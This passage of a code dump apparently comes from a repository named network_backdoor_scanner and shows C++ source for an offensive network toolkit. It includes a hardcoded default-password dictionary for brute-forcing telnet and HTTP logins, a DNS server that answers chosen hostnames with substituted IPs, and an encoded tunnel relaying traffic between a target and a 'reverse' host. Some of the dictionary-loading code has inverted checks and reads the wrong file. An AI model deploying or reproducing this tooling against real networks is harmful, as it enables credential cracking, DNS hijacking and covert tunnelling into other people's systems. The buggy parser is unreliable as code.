get_system_version(char* output_buffer) { 26 | OSVERSIONINFOEX_ system_info={0}; 27 | system_info.dwOSVersionInfoSize=sizeof(system_info); 28 | if (GetVersionEx((LPOSVERSIONINFO)&system_info)) { 29 | if (VER_PLATFORM_WIN32_NT==system_info.dwPlatformId) { 30 | if (VER_NT_WORKSTATION==system_info.wProductType) { 31 | if (10==system_info.dwMajorVersion && 0==system_info.dwMinorVersion) { 32 | strcpy(output_buffer,"Windows 10"); 33 | return true; 34 | } else if (6==system_info.dwMajorVersion && 3==system_info.dwMinorVersion) { 35 | strcpy(output_buffer,"Windows 8.1"); 36 | return true; 37 | } else if (6==system_info.dwMajorVersion && 2==system_info.dwMinorVersion) { 38 | strcpy(output_buffer,"Windows 8"); 39 | return true; 40 | } else if (6==system_info.dwMajorVersion && 1==system_info.dwMinorVersion) { 41 | strcpy(output_buffer,"Windows 7"); 42 | return true; 43 | } else if (6==system_info.dwMajorVersion && 0==system_info.dwMinorVersion) { 44 | strcpy(output_buffer,"Windows Vista"); 45 | return true; 46 | } else if (5==system_info.dwMajorVersion && 2==system_info.dwMinorVersion) { 47 | if (GetSystemMetrics(SM_SERVERR2)) { 48 | strcpy(output_buffer,"Windows Server 2003 R2"); 49 | return true; 50 | } else { 51 | strcpy(output_buffer,"Windows Server 2003"); 52 | return true; 53 | } 54 | } 55 | } else { 56 | if (10==system_info.dwMajorVersion && 0==system_info.dwMinorVersion) { 57 | strcpy(output_buffer,"Windows Server Technical Preview"); 58 | return true; 59 | } else if (6==system_info.dwMajorVersion && 3==system_info.dwMinorVersion) { 60 | strcpy(output_buffer,"Windows Server 2012 R2"); 61 | return true; 62 | } else if (6==system_info.dwMajorVersion && 2==system_info.dwMinorVersion) { 63 | strcpy(output_buffer,"Windows Server 2012"); 64 | return true; 65 | } else if (6==system_info.dwMajorVersion && 1==system_info.dwMinorVersion) { 66 | strcpy(output_buffer,"Windows Server 2008 R2"); 67 | return true; 68 | } else if (6==system_info.dwMajorVersion && 0==system_info.dwMinorVersion) { 69 | strcpy(output_buffer,"Windows Server 2008"); 70 | return true; 71 | } else if (5==system_info.dwMajorVersion && 1==system_info.dwMinorVersion) { 72 | strcpy(output_buffer,"Windows XP"); 73 | return true; 74 | } else if (5==system_info.dwMajorVersion && 0==system_info.dwMinorVersion) { 75 | strcpy(output_buffer,"Windows 2008"); 76 | return true; 77 | } 78 | } 79 | } else; // other platform 80 | } 81 | return false; 82 | } 83 | -------------------------------------------------------------------------------- /scanner_framework/local_information.h: -------------------------------------------------------------------------------- 1 | 2 | #ifndef _LOCAL_INFORMATION_H__ 3 | #define _LOCAL_INFORMATION_H__ 4 | 5 | bool get_system_version(char* output_buffer); 6 | 7 | #endif 8 | -------------------------------------------------------------------------------- /scanner_framework/local_network.cpp: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | 4 | #include 5 | #include 6 | 7 | #include "local_network.h" 8 | #include "scan_arp.h" 9 | #include "scan_tcp.h" 10 | #include "scan_icmp.h" 11 | 12 | #pragma comment (lib,"ws2_32") 13 | 14 | 15 | #define MAX_ADAPTER_NAME_LENGTH 256 16 | #define MAX_ADAPTER_DESCRIPTION_LENGTH 128 17 | #define MAX_ADAPTER_ADDRESS_LENGTH 8 18 | 19 | typedef struct { 20 | char String[4 * 4]; 21 | } IP_ADDRESS_STRING, *PIP_ADDRESS_STRING, IP_MASK_STRING, *PIP_MASK_STRING; 22 | 23 | typedef struct _IP_ADDR_STRING { 24 | struct _IP_ADDR_STRING* Next; 25 | IP_ADDRESS_STRING IpAddress; 26 | IP_MASK_STRING IpMask; 27 | DWORD Context; 28 | } IP_ADDR_STRING, *PIP_ADDR_STRING; 29 | 30 | typedef struct _IP_ADAPTER_INFO { 31 | struct _IP_ADAPTER_INFO *Next; 32 | DWORD ComboIndex; 33 | char AdapterName[MAX_ADAPTER_NAME_LENGTH + 4]; 34 | char Description[MAX_ADAPTER_DESCRIPTION_LENGTH + 4]; 35 | UINT AddressLength; 36 | BYTE Address[MAX_ADAPTER_ADDRESS_LENGTH]; 37 | DWORD Index; 38 | UINT Type; 39 | UINT DhcpEnabled; 40 | PIP_ADDR_STRING CurrentIpAddress; 41 | IP_ADDR_STRING IpAddressList; 42 | IP_ADDR_STRING GatewayList; 43 | IP_ADDR_STRING DhcpServer; 44 | BOOL HaveWins; 45 | IP_ADDR_STRING PrimaryWinsServer; 46 | IP_ADDR_STRING SecondaryWinsServer; 47 | time_t LeaseObtained; 48 | time_t LeaseExpires; 49 | } IP_ADAPTER_INFO, *PIP_ADAPTER_INFO; 50 | 51 | typedef DWORD (__stdcall *_GetAdaptersInfo)(PIP_ADAPTER_INFO,PULONG); 52 | 53 | char local_host_name[HOST_NAME_LENGTH]={0}; 54 | char local_ip[IPV4_IP_LENGTH]={0}; 55 | unsigned char local_mac[ETH_ADDRESS_LENGTH]={0}; 56 | char gateway_ip[IPV4_IP_LENGTH]={0}; 57 | unsigned char gateway_mac[ETH_ADDRESS_LENGTH]={0}; 58 | char dhcp_server[IPV4_IP_LENGTH]={0}; 59 | char network_mask[IPV4_IP_LENGTH]={0}; 60 | char network_session[IPV4_IP_LENGTH]={0}; 61 | char network_session_last[IPV4_IP_LENGTH]={0}; 62 | unsigned long network_session_size=0; 63 | 64 | static void get_ip(void) { 65 | gethostname(local_host_name,64); 66 | hostent* host=gethostbyname(local_host_name); 67 | char* ip=inet_ntoa(*(in_addr*)host->h_addr_list[0]); 68 | memcpy(local_ip,ip,strlen(ip)); 69 | } 70 | 71 | static void get_local_network_information(void) { 72 | HMODULE dll_iphlpapi=NULL; 73 | dll_iphlpapi=LoadLibrary("iphlpapi.dll"); 74 | _GetAdaptersInfo GetAdaptersInfo_=(_GetAdaptersInfo)GetProcAddress(dll_iphlpapi,"GetAdaptersInfo"); 75 | 76 | IP_ADAPTER_INFO local_network_data; 77 | unsigned long output_local_network_data_length=sizeof(local_network_data); 78 | DWORD return_code=GetAdaptersInfo_(&local_network_data,&output_local_network_data_length); 79 | 80 | if (ERROR_BUFFER_OVERFLOW==return_code) { 81 | return_code=GetAdaptersInfo_(&local_network_data,&output_local_network_data_length); 82 | } 83 | if (NO_ERROR==return_code) { 84 | memcpy(local_mac,&local_network_data.Address,ETH_ADDRESS_LENGTH); 85 | 86 | if (local_network_data.DhcpEnabled) 87 | memcpy(dhcp_server,&local_network_data.DhcpServer.IpAddress.String,IPV4_IP_LENGTH-1); 88 | memcpy(network_mask,&local_network_data.IpAddressList.IpMask.String,IPV4_IP_LENGTH-1); 89 | memcpy(gateway_ip,&local_network_data.GatewayList.IpAddress.String,IPV4_IP_LENGTH-1); 90 | 91 | unsigned long network_mask_=inet_addr(network_mask),local_ip_=inet_addr(local_ip); 92 | unsigned long network_session_=local_ip_&network_mask_; 93 | in_addr network_session___; 94 | network_session___.S_un.S_addr=network_session_; 95 | char* network_session__=inet_ntoa(network_session___); 96 | memcpy(network_session,network_session__,IPV4_IP_LENGTH-1); 97 | 98 | network_session_size=~htonl(network_mask_); 99 | 100 | network_session_=htonl(network_session_); 101 | network_session_+=network_session_size; 102 | network_session_=htonl(network_session_); 103 | network_session___.S_un.S_addr=network_session_; 104 | char* network_session_last_=inet_ntoa(network_session___); 105 | memcpy(network_session_last,network_session_last_,IPV4_IP_LENGTH-1); 106 | 107 | scan_arp(gateway_ip,(char*)gateway_mac); 108 | } 109 | } 110 | 111 | bool check_ip(const char* ip) { 112 | if (-1==inet_addr(ip)) 113 | return false; 114 | return true; 115 | } 116 | 117 | void local_network_init(void) { 118 | WSADATA init; 119 | WSAStartup(2,&init); 120 | scan_arp_init(); 121 | scan_tcp_init(); 122 | scan_icmp_init(); 123 | get_ip(); 124 | get_local_network_information(); 125 | } 126 | 127 | void local_network_clean(void) { 128 | scan_icmp_clean(); 129 | scan_tcp_clean(); 130 | scan_arp_clean(); 131 | WSACleanup(); 132 | } 133 | 134 | void sleep(unsigned int time) { 135 | Sleep(time); 136 | } 137 | 138 | bool get_host(const char* input_host,char* output_ip) { 139 | hostent* host=gethostbyname(input_host); 140 | if (NULL!=host) { 141 | char* copy_ip=inet_ntoa(*(in_addr*)host->h_addr_list[0]); 142 | memcpy(output_ip,copy_ip,IPV4_IP_LENGTH); 143 | return true; 144 | } 145 | return false; 146 | } 147 | -------------------------------------------------------------------------------- /scanner_framework/local_network.h: -------------------------------------------------------------------------------- 1 | 2 | #ifndef _LOCAL_NETWORK_H__ 3 | #define _LOCAL_NETWORK_H__ 4 | 5 | #define ETH_ADDRESS_LENGTH 6 6 | 7 | #define IPV4_IP_LENGTH 0x10 8 | 9 | #define HOST_NAME_LENGTH 64 10 | 11 | extern char local_host_name[HOST_NAME_LENGTH]; 12 | extern char local_ip[IPV4_IP_LENGTH]; 13 | extern unsigned char local_mac[ETH_ADDRESS_LENGTH]; 14 | extern char gateway_ip[IPV4_IP_LENGTH]; 15 | extern unsigned char gateway_mac[ETH_ADDRESS_LENGTH]; 16 | extern char dhcp_server[IPV4_IP_LENGTH]; 17 | extern char network_mask[IPV4_IP_LENGTH]; 18 | extern char network_session[IPV4_IP_LENGTH]; 19 | extern char network_session_last[IPV4_IP_LENGTH]; 20 | extern unsigned long network_session_size; 21 | 22 | bool check_ip(const char* ip); 23 | void local_network_init(void); 24 | void local_network_clean(void); 25 | void sleep(unsigned int time); 26 | bool get_host(const char* input_host,char* output_ip); 27 | 28 | #endif 29 | -------------------------------------------------------------------------------- /scanner_framework/local_thread.cpp: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | #include 5 | 6 | #include "local_thread.h" 7 | 8 | unsigned long create_thread(void* function_address,void* function_parameter_list) { 9 | HANDLE thread_handle=CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)function_address,(LPVOID)function_parameter_list,NULL,NULL); 10 | if (INVALID_HANDLE_VALUE!=thread_handle) 11 | return (unsigned long)thread_handle; 12 | return -1; 13 | } 14 | 15 | void wait_thread(unsigned long thread_handle) { 16 | WaitForSingleObject((HANDLE)thread_handle,INFINITE); 17 | } 18 | 19 | void close_thread(unsigned long thread_handle) { 20 | CloseHandle(thread_handle); 21 | } 22 | -------------------------------------------------------------------------------- /scanner_framework/local_thread.h: -------------------------------------------------------------------------------- 1 | 2 | #ifndef _LOCAL_THREAD_H__ 3 | #define _LOCAL_THREAD_H__ 4 | 5 | unsigned long create_thread(void* function_address,void* function_parameter_list); 6 | void wait_thread(unsigned long thread_handle); 7 | void close_thread(unsigned long thread_handle); 8 | 9 | #endif 10 | 11 | -------------------------------------------------------------------------------- /scanner_framework/main.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/network_backdoor_scanner/6d590e59ef48c6bebc127f0f92192a7584a63e04/scanner_framework/main.cpp -------------------------------------------------------------------------------- /scanner_framework/network_crack.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/network_backdoor_scanner/6d590e59ef48c6bebc127f0f92192a7584a63e04/scanner_framework/network_crack.cpp -------------------------------------------------------------------------------- /scanner_framework/network_crack.h: -------------------------------------------------------------------------------- 1 | 2 | #ifndef _NETWORK_CRACK_H__ 3 | #define _NETWORK_CRACK_H__ 4 | 5 | #include "resolver_dictionary.h" 6 | #include "resolver_http.h" 7 | 8 | #ifndef _STRING_ 9 | 10 | #include 11 | 12 | using std::string; 13 | using std::pair; 14 | 15 | #endif 16 | 17 | #ifndef _VECTOR_ 18 | 19 | #include 20 | 21 | using std::vector; 22 | 23 | #endif 24 | 25 | #define NETWORK_CRACK_TIMEOUT 5000 26 | #define NETWORK_CRACK_RECV_BUFFER_LENGTH 1024*10 27 | 28 | 29 | typedef vector crack_packet_raw; 30 | typedef vector crack_packet_http; 31 | typedef pair crack_index; 32 | 33 | crack_packet_raw network_crack_init(const string crack_packet,...); 34 | crack_packet_http network_crack_init(const http_packet& crack_packet,...); 35 | 36 | crack_index network_crack_online(const string target_ip,const unsigned int target_port,const crack_packet_raw& crack_packet,const string crack_term,bool first_recv); 37 | crack_index network_crack_online(const string target_ip,const unsigned int target_port,const crack_packet_http& crack_packet,const string crack_term,bool first_recv); 38 | 39 | crack_index network_crack_telnet(const string target_ip,const unsigned int target_port,const dictionary& crack_dictionary); 40 | crack_index network_crack_http(const string target_ip,const unsigned int target_port,dictionary crack_dictionary,const string crack_express,const string crack_term); 41 | 42 | 43 | #endif 44 | 45 | -------------------------------------------------------------------------------- /scanner_framework/network_dictionary.h: -------------------------------------------------------------------------------- 1 | 2 | #ifndef _NETWORD_DICTIONARY_H__ 3 | #define _NETWORD_DICTIONARY_H__ 4 | 5 | const char* username[]={ 6 | "admin", 7 | "root", 8 | "administrator", 9 | "guest" 10 | }; 11 | 12 | const char* password[]={ 13 | "", 14 | "0123456789", 15 | "admin", 16 | "root", 17 | "toor", 18 | "access", 19 | "debug", 20 | "Manager", 21 | "User", 22 | "guest", 23 | "cicso", 24 | "sa", 25 | "super", 26 | "install", 27 | "123456", 28 | "1q2w3e4r", 29 | "fuckyou", 30 | "wocaoni", 31 | "Password", 32 | "password" 33 | }; 34 | 35 | #endif 36 | -------------------------------------------------------------------------------- /scanner_framework/network_encoder.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/network_backdoor_scanner/6d590e59ef48c6bebc127f0f92192a7584a63e04/scanner_framework/network_encoder.cpp -------------------------------------------------------------------------------- /scanner_framework/network_encoder.h: -------------------------------------------------------------------------------- 1 | 2 | #ifndef _NETWORK_ENCODER_H__ 3 | #define _NETWORK_ENCODER_H__ 4 | 5 | unsigned int network_encode(char* encode_string,unsigned int encode_string_length_) ; 6 | void network_decode(char* decode_string,unsigned int decode_string_length); 7 | 8 | #endif 9 | -------------------------------------------------------------------------------- /scanner_framework/network_route.cpp: -------------------------------------------------------------------------------- 1 | 2 | #pragma warning (disable:4786) 3 | 4 | #include 5 | 6 | #include 7 | #include 8 | 9 | #include 10 | 11 | #include "network_encoder.h" 12 | #include "network_route.h" 13 | #include "scan_tcp.h" 14 | 15 | 16 | using std::string; 17 | using std::pair; 18 | using std::vector; 19 | 20 | 21 | typedef pair pair_thread; 22 | typedef pair pair_handle; 23 | typedef pair port; 24 | typedef vector port_list; 25 | 26 | 27 | port_list route_list; 28 | 29 | 30 | static void network_route_thread_tunnal(pair_handle* pair_socket) { 31 | char recv_buffer[PACKET_RECV_BUFFER]={0}; 32 | 33 | while (true) { 34 | unsigned int recv_length=scan_tcp_recv(pair_socket->first,recv_buffer,PACKET_RECV_BUFFER); 35 | 36 | if (-1==recv_length || !recv_length) 37 | break; 38 | 39 | network_decode(recv_buffer,recv_length); 40 | scan_tcp_send(pair_socket->second,recv_buffer,recv_length); 41 | memset(recv_buffer,0,recv_length); 42 | } 43 | 44 | // delete pair_socket; 45 | } 46 | 47 | static void network_route_thread_local(pair_handle* pair_socket) { 48 | char recv_buffer[PACKET_RECV_BUFFER]={0}; 49 | 50 | while (true) { 51 | unsigned int recv_length=scan_tcp_recv(pair_socket->first,recv_buffer,PACKET_RECV_BUFFER); 52 | 53 | if (-1==recv_length || !recv_length) 54 | break; 55 | 56 | recv_length=network_encode(recv_buffer,recv_length); 57 | scan_tcp_send(pair_socket->second,recv_buffer,recv_length); 58 | memset(recv_buffer,0,recv_length); 59 | } 60 | 61 | // delete pair_socket; 62 | } 63 | 64 | bool network_route(const char* remote_ip,unsigned int remote_port,const char* reverse_ip,unsigned int reverse_port) { 65 | unsigned int remote_handle=scan_tcp_connect(remote_ip,remote_port); 66 | unsigned int reverse_handle=scan_tcp_connect(reverse_ip,reverse_port); 67 | 68 | if (-1!=remote_handle && -1!=reverse_handle) { 69 | HANDLE remote_thread=CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)&network_route_thread_local,new pair_handle(remote_handle,reverse_handle),NULL,NULL); 70 | HANDLE reverse_thread=CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)&network_route_thread_tunnal,new pair_handle(reverse_handle,remote_handle),NULL,NULL); 71 | 72 | if (INVALID_HANDLE_VALUE!=remote_thread && INVALID_HANDLE_VALUE!=reverse_thread) { 73 | // no static but you can custom it ! .. 74 | return true; 75 | } 76 | } 77 | scan_tcp_disconnect(remote_handle); 78 | scan_tcp_disconnect(reverse_handle); 79 | return false; 80 | } 81 | -------------------------------------------------------------------------------- /scanner_framework/network_route.h: -------------------------------------------------------------------------------- 1 | 2 | #ifndef _NETWORK_ROUTE_H__ 3 | #define _NETWORK_ROUTE_H__ 4 | 5 | bool network_route(const char* remote_ip,unsigned int remote_port,const char* reverse_ip,unsigned int reverse_port); 6 | 7 | #endif 8 | -------------------------------------------------------------------------------- /scanner_framework/network_server_dns.cpp: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #include 8 | #include 9 | 10 | #include 11 | #include 12 | 13 | #include "local_network.h" 14 | #include "network_server_dns.h" 15 | 16 | using std::string; 17 | using std::vector; 18 | 19 | #define DNS_PORT 53 20 | #define DNS_QUERY_TYPE 0x1 21 | #define DNS_SEND_BUFFER 1024 22 | #define DNS_RECV_BUFFER 1024 23 | 24 | #pragma comment (lib,"ws2_32") 25 | 26 | #pragma pack(1) 27 | 28 | typedef struct { 29 | unsigned short id; 30 | unsigned short flags; 31 | unsigned short quests; 32 | unsigned short answers; 33 | unsigned short author; 34 | unsigned short addition; 35 | } dns,*point_dns; 36 | 37 | typedef struct { 38 | unsigned char *name; 39 | unsigned short type; 40 | unsigned short classes; 41 | } query,*point_query; 42 | 43 | typedef struct { 44 | unsigned short name; 45 | unsigned short type; 46 | unsigned short classes; 47 | unsigned long ttl; 48 | unsigned short length; 49 | unsigned long addr; 50 | } response,*point_response; 51 | 52 | #pragma pack(4) 53 | 54 | typedef struct { 55 | string host; 56 | string ip; 57 | } dns_host_entry; 58 | typedef vector dns_host_entry_list; 59 | 60 | SOCKET dns_sock=SOCKET_ERROR; 61 | HANDLE dns_thread_handle=INVALID_HANDLE_VALUE; 62 | CRITICAL_SECTION dns_thread_signal={0}; 63 | dns_host_entry_list dns_host_list; 64 | bool loop_flag=true; 65 | 66 | static char* conver_host(char* input_host) { 67 | if (NULL==input_host) return NULL; 68 | 69 | char* output_string=NULL; 70 | char* host=input_host; 71 | unsigned short alloc_length=0; 72 | while ('\0'!=*host) { 73 | alloc_length+=*(unsigned char*)host+1; 74 | host=(char*)(input_host+alloc_length); 75 | } 76 | output_string=(char*)malloc(alloc_length); 77 | memset(output_string,0,alloc_length); 78 | unsigned short read_point=0; 79 | while ('\0'!=*input_host) { 80 | unsigned char read_length=*input_host++; 81 | memcpy((char*)(output_string+read_point),input_host,read_length); 82 | *(char*)(output_string+read_point+read_length)='.'; 83 | read_point+=read_length+1; 84 | input_host+=read_length; 85 | } 86 | *(char*)(output_string+read_point-1)='\0'; 87 | 88 | return output_string; 89 | } 90 | 91 | static void network_server_dns_thread(void) { 92 | while (loop_flag) { 93 | char recv_buffer[DNS_RECV_BUFFER]={0}; 94 | sockaddr_in remote; 95 | int remote_length=sizeof(remote); 96 | int recv_length=recvfrom(dns_sock,recv_buffer,DNS_RECV_BUFFER,0,(sockaddr*)&remote,&remote_length); 97 | if (SOCKET_ERROR!=recv_length) { 98 | point_dns dns_=(point_dns)recv_buffer; 99 | point_query query_=(point_query)&recv_buffer[sizeof(dns)]; 100 | unsigned short query_type=ntohs(*(unsigned short*)((unsigned long)query_+strlen((const char*)query_)+1)); 101 | if (DNS_QUERY_TYPE==query_type) { 102 | bool hijack_flag=false; 103 | char* query_host=conver_host((char*)query_); 104 | unsigned int query_total=ntohs(dns_->quests); 105 | 106 | string host_ip; 107 | EnterCriticalSection(&dns_thread_signal); 108 | for (dns_host_entry_list::iterator entry_list_iterator=dns_host_list.begin(); 109 | entry_list_iterator!=dns_host_list.end(); 110 | ++entry_list_iterator) { 111 | string query_host_(query_host); 112 | if (entry_list_iterator->host==query_host_) { 113 | host_ip=entry_list_iterator->ip; 114 | hijack_flag=true; 115 | break; 116 | } 117 | } 118 | LeaveCriticalSection(&dns_thread_signal); 119 | free(query_host); 120 | 121 | if (hijack_flag) { 122 | char send_buffer[DNS_SEND_BUFFER]={0}; 123 | response response; 124 | if (host_ip.empty()) 125 | response.addr=inet_addr(local_ip); 126 | else 127 | response.addr=inet_addr(host_ip.c_str()); 128 | response.length=htons(4); 129 | response.classes=htons(1); 130 | response.ttl=htonl(300); 131 | response.type=htons(query_type); 132 | response.name=htons(0xC00C); 133 | dns_->flags=htons(0x8180); 134 | dns_->answers=htons(1); 135 | memcpy(send_buffer,recv_buffer,recv_length); 136 | memcpy(&send_buffer[recv_length],&response,sizeof(response)); 137 | sendto(dns_sock,send_buffer,recv_length+sizeof(response),0,(const sockaddr*)&remote,sizeof(remote)); 138 | } 139 | } 140 | } else 141 | break; 142 | } 143 | } 144 | 145 | bool network_server_dns_start(void) { 146 | SOCKET sock=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP); 147 | 148 | sockaddr_in local; 149 | local.sin_addr.S_un.S_addr=0; 150 | local.sin_family=AF_INET; 151 | local.sin_port=htons(DNS_PORT); 152 | if (SOCKET_ERROR==bind(sock,(const sockaddr*)&local,sizeof(sockaddr_in))) 153 | return false; 154 | 155 | dns_thread_handle=CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)&network_server_dns_thread,NULL,NULL,NULL); 156 | if (INVALID_HANDLE_VALUE==dns_thread_handle) { 157 | closesocket(sock); 158 | return false; 159 | } 160 | InitializeCriticalSection(&dns_thread_signal); 161 | dns_sock=sock; 162 | return true; 163 | } 164 | 165 | void network_server_dns_add(const char* host,const char* ip) { 166 | EnterCriticalSection(&dns_thread_signal); 167 | for (dns_host_entry_list::iterator entry_list_iterator=dns_host_list.begin(); 168 | entry_list_iterator!=dns_host_list.end(); 169 | ++entry_list_iterator) { 170 | if (entry_list_iterator->host==host) { 171 | entry_list_iterator->ip=ip; 172 | goto EXIT; 173 | } 174 | }{ 175 | dns_host_entry new_entry; 176 | new_entry.host=host; 177 | new_entry.ip=ip; 178 | dns_host_list.push_back(new_entry);} 179 | EXIT: 180 | LeaveCriticalSection(&dns_thread_signal); 181 | } 182 | 183 | void network_server_dns_delete(const char* host) { 184 | EnterCriticalSection(&dns_thread_signal); 185 | for (dns_host_entry_list::iterator entry_list_iterator=dns_host_list.begin(); 186 | entry_list_iterator!=dns_host_list.end(); 187 | ++entry_list_iterator) { 188 | if (entry_list_iterator->host==host) { 189 | dns_host_list.erase(entry_list_iterator); 190 | goto EXIT; 191 | } 192 | } 193 | EXIT: 194 | LeaveCriticalSection(&dns_thread_signal); 195 | } 196 | 197 | void network_server_dns_close(void) { 198 | DeleteCriticalSection(&dns_thread_signal); 199 | CloseHandle(dns_thread_handle); 200 | dns_thread_handle=INVALID_HANDLE_VALUE; 201 | closesocket(dns_sock); 202 | dns_sock=SOCKET_ERROR; 203 | } 204 | -------------------------------------------------------------------------------- /scanner_framework/network_server_dns.h: -------------------------------------------------------------------------------- 1 | 2 | #ifndef _NETWORK_SERVER_DNS_ 3 | #define _NETWORK_SERVER_DNS_ 4 | 5 | bool network_server_dns_start(void); 6 | void network_server_dns_add(const char* host,const char* ip); 7 | void network_server_dns_delete(const char* host); 8 | void network_server_dns_close(void); 9 | 10 | #endif 11 | -------------------------------------------------------------------------------- /scanner_framework/resolver_dictionary.cpp: -------------------------------------------------------------------------------- 1 | 2 | #pragma warning (disable:4503) 3 | #pragma warning (disable:4786) 4 | 5 | #include 6 | #include 7 | #include 8 | 9 | #include "resolver_dictionary.h" 10 | #include "resolver_string.h" 11 | 12 | 13 | dictionary resolve_dictionary_open(const string dictionary_path) { 14 | dictionary result; 15 | FILE* file_handle=fopen(dictionary_path.c_str(),"r"); 16 | 17 | if (NULL!=file_handle) { 18 | fseek(file_handle,0,SEEK_END); 19 | unsigned long file_length=ftell(file_handle); 20 | 21 | if (!file_length) { 22 | char* file_buffer=(char*)malloc(file_length); 23 | 24 | if (NULL!=file_buffer) { 25 | fseek(file_handle,0,SEEK_SET); 26 | memset(file_buffer,0,file_length); 27 | fread(file_buffer,1,file_length,file_handle); 28 | string resolve_string(file_buffer); 29 | 30 | try { 31 | unsigned long resolve_point=find_string(resolve_string,"\r\n"); 32 | split_result split; 33 | while (!resolve_point) { 34 | split=split_string(resolve_string,resolve_point); 35 | string line(split.first); 36 | split_result split_line(split_string(line,find_string(line," "))); 37 | left_move_string(split_line.second,1); 38 | string username(split_line.first),password(split_line.second); 39 | left_remove_space(username); 40 | right_remove_space(username); 41 | left_remove_space(password); 42 | right_remove_space(password); 43 | result[username].push_back(password); 44 | resolve_string=split.second; 45 | left_move_string(resolve_string,2); 46 | resolve_point=find_string(resolve_string,"\r\n"); 47 | } 48 | } catch (...) { 49 | } 50 | free(file_buffer); 51 | } 52 | } 53 | fclose(file_handle); 54 | } 55 | return result; 56 | } 57 | 58 | dictionary resolve_dictionary_open(const string username_path,const string password_path) { 59 | dictionary result; 60 | password_list password_list_; 61 | FILE* file_username=fopen(username_path.c_str(),"r"); 62 | FILE* file_password=fopen(password_path.c_str(),"r"); 63 | 64 | if (NULL!=file_username && NULL!=file_password) { 65 | fseek(file_username,0,SEEK_END); 66 | fseek(file_password,0,SEEK_END); 67 | unsigned long file_username_length=ftell(file_username); 68 | unsigned long file_password_length=ftell(file_password); 69 | 70 | if (!file_username_length && !file_password_length) { 71 | char* file_username_buffer=(char*)malloc(file_username_length); 72 | char* file_password_buffer=(char*)malloc(file_password_length); 73 | 74 | if (NULL!=file_username_buffer && NULL!=file_password_buffer) { 75 | fseek(file_username,0,SEEK_SET); 76 | memset(file_username_buffer,0,file_username_length); 77 | fread(file_username_buffer,1,file_username_length,file_username); 78 | fseek(file_password,0,SEEK_SET); 79 | memset(file_password_buffer,0,file_password_length); 80 | fread(file_password_buffer,1,file_password_length,file_username); 81 | 82 | string resolve_username(file_username_buffer); 83 | string resolve_password(file_password_buffer); 84 | 85 | try { 86 | unsigned long resolve_point=find_string(resolve_password,"\r\n"); 87 | split_result split; 88 | 89 | while (!resolve_point) { 90 | split=split_string(resolve_password,resolve_point); 91 | left_remove_space(split.first); 92 | right_remove_space(split.first); 93 | password_list_.push_back(split.first); 94 | resolve_password=split.second; 95 | left_move_string(resolve_password,2); 96 | resolve_point=find_string(resolve_password,"\r\n"); 97 | } 98 | } catch(...) { 99 | } 100 | 101 | try { 102 | unsigned long resolve_point=find_string(resolve_password,"\r\n"); 103 | split_result split; 104 | while (!resolve_point) { 105 | split=split_string(resolve_username,resolve_point); 106 | result.insert(pair(split.first,password_list_)); 107 | resolve_username=split.second; 108 | left_move_string(resolve_username,2); 109 | resolve_point=find_string(resolve_username,"\r\n"); 110 | } 111 | } catch(...) { 112 | } 113 | free(file_username_buffer); 114 | free(file_password_buffer); 115 | } 116 | } 117 | fclose(file_username); 118 | fclose(file_password); 119 | } 120 | return result; 121 | } 122 | 123 | bool resolve_dictionary_is_empty(const dictionary& in_dictionary) { 124 | return in_dictionary.empty(); 125 | } 126 | 127 | unsigned int resolve_dictionary_get_user_count(const dictionary& in_dictionary) { 128 | return in_dictionary.size(); 129 | } 130 | 131 | username_list resolve_dictionary_get_user_list(const dictionary& in_dictionary) { 132 | username_list result; 133 | 134 | for (dictionary::const_iterator iterator=in_dictionary.begin(); 135 | iterator!=in_dictionary.end(); 136 | ++iterator) 137 | result.push_back(iterator->first); 138 | 139 | return result; 140 | } 141 | 142 | unsigned int resolve_dictionary_get_password_count(const dictionary& in_dictionary) { 143 | if (!resolve_dictionary_is_empty(in_dictionary)) 144 | return in_dictionary.begin()->second.size(); 145 | return 0; 146 | } 147 | 148 | password_list resolve_dictionary_get_password_list(const dictionary& in_dictionary,const string username) { 149 | password_list result; 150 | for (dictionary::const_iterator iterator=in_dictionary.begin(); 151 | iterator!=in_dictionary.end(); 152 | ++iterator) { 153 | if (username==iterator->first) { 154 | result=iterator->second; 155 | break; 156 | } 157 | } 158 | 159 | return result; 160 | } 161 | 162 | void resolve_dictionary_add_username(dictionary& in_dictionary,const string username) { 163 | if (!in_dictionary.empty()) { 164 | in_dictionary[username]=in_dictionary.begin()->second; 165 | } else { 166 | password_list empty_list; 167 | in_dictionary[username]=empty_list; 168 | } 169 | } 170 | 171 | void resolve_dictionary_add_password(dictionary& in_dictionary,const string password) { 172 | if (!in_dictionary.empty()) { 173 | for (dictionary::iterator iterator=in_dictionary.begin(); 174 | iterator!=in_dictionary.end(); 175 | ++iterator) { 176 | iterator->second.push_back(password); 177 | } 178 | } 179 | } 180 | 181 | void resolve_dictionary_add_password(dictionary& in_dictionary,const password_list password) { 182 | if (!in_dictionary.empty()) { 183 | for (dictionary::iterator username_iterator=in_dictionary.begin(); 184 | username_iterator!=in_dictionary.end(); 185 | ++username_iterator) { 186 | for (password_list::const_iterator password_iterator=password.begin(); 187 | password_iterator!=password.end(); 188 | ++password_iterator) { 189 | username_iterator->second.push_back(*password_iterator); 190 | } 191 | } 192 | } 193 | } 194 | -------------------------------------------------------------------------------- /scanner_framework/resolver_dictionary.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | #ifndef _RESOVLVER_DICTIONARY_H__ 4 | #define _RESOVLVER_DICTIONARY_H__ 5 | 6 | 7 | #ifndef _STRING_ 8 | 9 | #include 10 | 11 | using std::string; 12 | using std::pair; 13 | 14 | #endif 15 | 16 | #ifndef _MAP_ 17 | 18 | #include 19 | 20 | using std::map; 21 | 22 | #endif 23 | 24 | #ifndef _VECTOR_ 25 | 26 | #include 27 | 28 | using std::vector; 29 | 30 | #endif 31 | 32 | 33 | typedef vector username_list; 34 | typedef vector password_list; 35 | typedef map dictionary; 36 | 37 | 38 | dictionary resolve_dictionary_open(const string dictionary_path); 39 | dictionary 